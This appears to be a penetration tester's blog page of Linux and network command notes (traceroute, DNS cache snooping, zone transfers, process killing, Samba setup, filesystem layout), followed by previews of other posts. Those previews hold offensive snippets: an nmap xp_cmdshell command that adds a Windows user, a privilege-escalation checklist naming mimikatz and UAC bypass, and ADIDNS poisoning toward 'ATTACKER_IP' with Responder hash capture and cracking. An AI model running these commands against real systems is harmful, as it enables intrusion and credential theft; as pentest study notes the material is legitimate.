Skip to main content

Network & Linux Tools

By

 

 

Traceroute 

By default, tracroute sends UDP packets with incrementing dest ports starting at the bsae port of 33434, going up by one port for each packet sent (each hop measured 3 times)

#traceroute to multiple hosts 
traceroute -g 10.10.10.1, 10.10.10.2

#Use ICMP instead of UDP
traceroute -I 10.10.10.10

#Use TCP SYN instead of UDP
traceroute -T 10.10.10.10


Online Traceroute Websites: 

1) Traceroute.org 
2) Kloth.net/services/traceroute.php
3) tracert.com
nslookup

check if there is anything in the  - DNS Cache Snooping

>nslookup

set norecurse
www.website.com 

set recurse
wwww.website.com

#Zone transfer 
> dig @10.10.10.10 target -t AXFR 

#Incremental Zone Transfer 
dig @10.10.10.10 -t IXFR=N 
Kill a running Process/Open Port 

netstat -pantp | grep LIST

#View the process ID 
sudo lsof -t -i:80 

#Kill the process
sudo fuser -k 80/tcp 
Find Largest Files in Linux

du -a /var | sort -n -r | head -n 10

#Get Readable output
du -hsx -- * | sort -rh | head -10
Installing Samba on Kali Linux

sudo apt install samba
sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.old

#edit the shared folder path 
sudo nano /etc/samba/smb.conf

#create a new user 
sudo smbpasswd -a kali

sudo systemctl start smbd
sudo systemctl start nmbd


Kill All process with a same name 

ps -ef | grep 'myProcessName' | grep -v grep | awk '{print $2}' | xargs -r kill -9

or

for KILLPID in `ps ax | grep 'Process_NAME' | awk ' { print $1;}'`; do 
  kill -9 $KILLPID;
done
Kill a process running on a port 

fuser -k 4444/tcp

Add a path to $PATH permanently

nano ~/.bashrc
export PATH="$PATH:/usr/local/go/bin"

Check Service Manager being used 

ps -p 1 -o comm=

systemd: Indicates the systemd service manager.
init: Suggests the traditional System V init.
upstart: Implies the Upstart init system.

For systemd: If the systemctl command is available, it indicates systemd.
For System V init: If the service or /etc/init.d/ directory is present, it suggests the use of System V init.
For Upstart: If the initctl command is available, it suggests Upstart.


#List the process tree
pstree -p 1

This command will display the process tree starting from the init process. Look for process names or directories associated with specific service managers, such as systemd, upstart, or init.


Looking at Directories 
Examine the /sbin directory: Look for specific executables or symbolic links in the /sbin directory that indicate the service manager. For example:

/sbin/init: Suggests SysV init.
/sbin/initctl: Suggests Upstart.
/sbin/systemctl: Indicates systemd.

Linux Directories File Structure - Filesystem Hierarchy Standard (FHS)

1. `/sbin`: The `/sbin` directory contains system binaries (commands) that are primarily used by system administrators for system maintenance and management tasks. Some important binaries found in `/sbin` include:
   - `init`: The system initialization program (SysV init or systemd).
   - `shutdown`: Command to initiate system shutdown.
   - `reboot`: Command to reboot the system.
   - `ifconfig`: Tool for configuring network interfaces (deprecated in favor of `ip` command).
   - `fdisk`: Utility for partitioning disks.
   - `iptables`: Command for managing netfilter firewall rules (legacy; replaced by `nftables` in some distributions).

Other important directories in the Linux filesystem hierarchy include:

2. `/bin`: This directory contains essential command binaries that are required for normal system operation. These binaries are generally available to all users and are necessary for basic system functionality (e.g., `ls`, `cp`, `mv`, `mkdir`).

3. `/usr`: The `/usr` directory contains user-related programs and data. It has several subdirectories including:
   - `/usr/bin`: Non-essential command binaries for user access.
   - `/usr/sbin`: Non-essential system binaries used by system administrators.
   - `/usr/lib`: Libraries for programs in `/usr/bin` and `/usr/sbin`.
   - `/usr/local`: Programs and data specific to the local machine, often manually installed.

4. `/etc`: The `/etc` directory contains system-wide configuration files. It includes configuration files for various services, network settings, system startup, and more.

5. `/var`: The `/var` directory holds variable data files that are expected to change during system operation. It includes directories such as `/var/log` (system logs), `/var/spool` (print and mail spools), and `/var/www` (web server files).

6. `/home`: Each user on the system typically has a home directory under `/home`. User-specific files and configurations are stored here.

7. `/tmp`: The `/tmp` directory provides a location for temporary files that are accessible to all users. The contents of this directory are typically deleted upon reboot.

Troubleshooting Network IP Address is already Used.





Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more